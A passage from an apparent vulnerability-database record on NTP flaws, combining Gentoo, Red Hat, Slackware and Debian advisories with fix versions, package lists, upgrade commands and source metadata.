- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ntp security update\nAdvisory ID: RHSA-2016:1141-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2016:1141\nIssue date: 2016-05-31\nCVE Names: CVE-2015-7979 CVE-2016-1547 CVE-2016-1548 \n CVE-2016-1550 CVE-2016-2518 \n=====================================================================\n\n1. Summary:\n\nAn update for ntp is now available for Red Hat Enterprise Linux 6 and Red\nHat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol (NTP) is used to synchronize a computer\u0027s time\nwith another referenced time source. These packages include the ntpd\nservice which continuously adjusts system time and utilities used to query\nand configure the ntpd service. \n\nSecurity Fix(es):\n\n* It was found that when NTP was configured in broadcast mode, a remote\nattacker could broadcast packets with bad authentication to all clients. \nThe clients, upon receiving the malformed packets, would break the\nassociation with the broadcast server, causing them to become out of sync\nover a longer period of time. (CVE-2015-7979)\n\n* A denial of service flaw was found in the way NTP handled preemptable\nclient associations. (CVE-2016-1547)\n\n* It was found that an ntpd client could be forced to change from basic\nclient/server mode to the interleaved symmetric mode. (CVE-2016-1548)\n\n* A flaw was found in the way NTP\u0027s libntp performed message\nauthentication. An attacker able to observe the timing of the comparison\nfunction used in packet authentication could potentially use this flaw to\nrecover the message digest. (CVE-2016-1550)\n\n* An out-of-bounds access flaw was found in the way ntpd processed certain\npackets. An authenticated attacker could use a crafted packet to create a\npeer association with hmode of 7 and larger, which could potentially\n(although highly unlikely) cause ntpd to crash. (CVE-2016-2518)\n\nThe CVE-2016-1548 issue was discovered by Miroslav Lichvar (Red Hat). \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1300271 - CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode\n1331461 - CVE-2016-1547 ntp: crypto-NAK preemptable association denial of service\n1331462 - CVE-2016-1548 ntp: ntpd switching to interleaved mode with spoofed packets\n1331464 - CVE-2016-1550 ntp: libntp message digest disclosure\n1331468 - CVE-2016-2518 ntp: out-of-bounds references on crafted packet\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nppc64:\nntp-4.2.6p5-10.el6.1.ppc64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm\nntpdate-4.2.6p5-10.el6.1.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-10.el6.1.s390x.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm\nntpdate-4.2.6p5-10.el6.1.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm\nntp-perl-4.2.6p5-10.el6.1.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm\nntp-perl-4.2.6p5-10.el6.1.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nppc64:\nntp-4.2.6p5-22.el7_2.2.ppc64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm\nntpdate-4.2.6p5-22.el7_2.2.ppc64.rpm\n\nppc64le:\nntp-4.2.6p5-22.el7_2.2.ppc64le.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm\nntpdate-4.2.6p5-22.el7_2.2.ppc64le.rpm\n\ns390x:\nntp-4.2.6p5-22.el7_2.2.s390x.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm\nntpdate-4.2.6p5-22.el7_2.2.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm\nsntp-4.2.6p5-22.el7_2.2.ppc64.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm\nsntp-4.2.6p5-22.el7_2.2.ppc64le.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm\nsntp-4.2.6p5-22.el7_2.2.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-7979\nhttps://access.redhat.com/security/cve/CVE-2016-1547\nhttps://access.redhat.com/security/cve/CVE-2016-1548\nhttps://access.redhat.com/security/cve/CVE-2016-1550\nhttps://access.redhat.com/security/cve/CVE-2016-2518\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXTUp2XlSAg2UNWIIRAqUmAKC32P98McZUqU1gzWxBbCz0hn0eagCfRtrx\nSULnKXrtTJd5iJ6eQVtDnxA=\n=hETy\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. \n This release patches several low and medium severity security issues:\n CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering\n CVE-2016-1549: Sybil vulnerability: ephemeral association attack,\n AKA: ntp-sybil - MITIGATION ONLY\n CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion\n botch\n CVE-2016-2517: Remote configuration trustedkey/requestkey values are not\n properly validated\n CVE-2016-2518: Crafted addpeer with hmode \u003e 7 causes array wraparound with\n MATCH_ASSOC\n CVE-2016-2519: ctl_getitem() return value not always checked\n CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos\n CVE-2016-1548: Interleave-pivot - MITIGATION ONLY\n CVE-2015-7704: KoD fix: peer associations were broken by the fix for\n NtpBug2901, AKA: Symmetric active/passive mode is broken\n CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks\n CVE-2016-1550: Improve NTP security against buffer comparison timing attacks,\n authdecrypt-timing, AKA: authdecrypt-timing\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ndfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ne760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\naa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\ndbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz\n\nSlackware x86_64 -current package:\n7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nCVE-2015-7977 / CVE-2015-7978\n\n Stephen Gray discovered that a NULL pointer dereference and a\n buffer overflow in the handling of \"ntpdc reslist\" commands may\n result in denial of service. \n\nCVE-2016-2518\n\n Yihan Lian discovered that an OOB memory access could potentially\n crash ntpd. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7+deb8u2. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1:4.2.8p7+dfsg-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.8p7+dfsg-1. \n\nWe recommend that you upgrade your ntp packages", "sources": [ { "db": "NVD", "id": "CVE-2016-1547" }, { "db": "CERT/CC", "id": "VU#718152" }, { "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "db": "BID", "id": "88276" }, { "db": "VULMON", "id": "CVE-2016-1547" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" } ], "trust": 3.24 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-1547", "trust": 3.4 }, { "db": "CERT/CC", "id": "VU#718152", "trust": 2.0 }, { "db": "BID", "id": "88276", "trust": 2.0 }, { "db": "SECTRACK", "id": "1035705", "trust": 1.7 }, { "db": "TALOS", "id": "TALOS-2016-0081", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-21-103-11", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-211752", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-497656", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU95781418", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU96269392", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU91176422", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-006648", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-21-159-11", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021061008", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201604-602", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2016-1547", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138984", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138162", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137244", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136864", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138052", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1547" }, { "db": "BID", "id": "88276" }, { "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-1547" }, { "db": "CNNVD", "id": "CNNVD-201604-602" } ] }, "id": "VAR-201701-1138", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.33987721 }, "last_update_date": "2023-12-18T11:19:28.340000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "TALOS-2016-0081", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security" }, { "title": "ntpd Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=61285" }, { "title": "The Register", "trust": 0.2, "url": 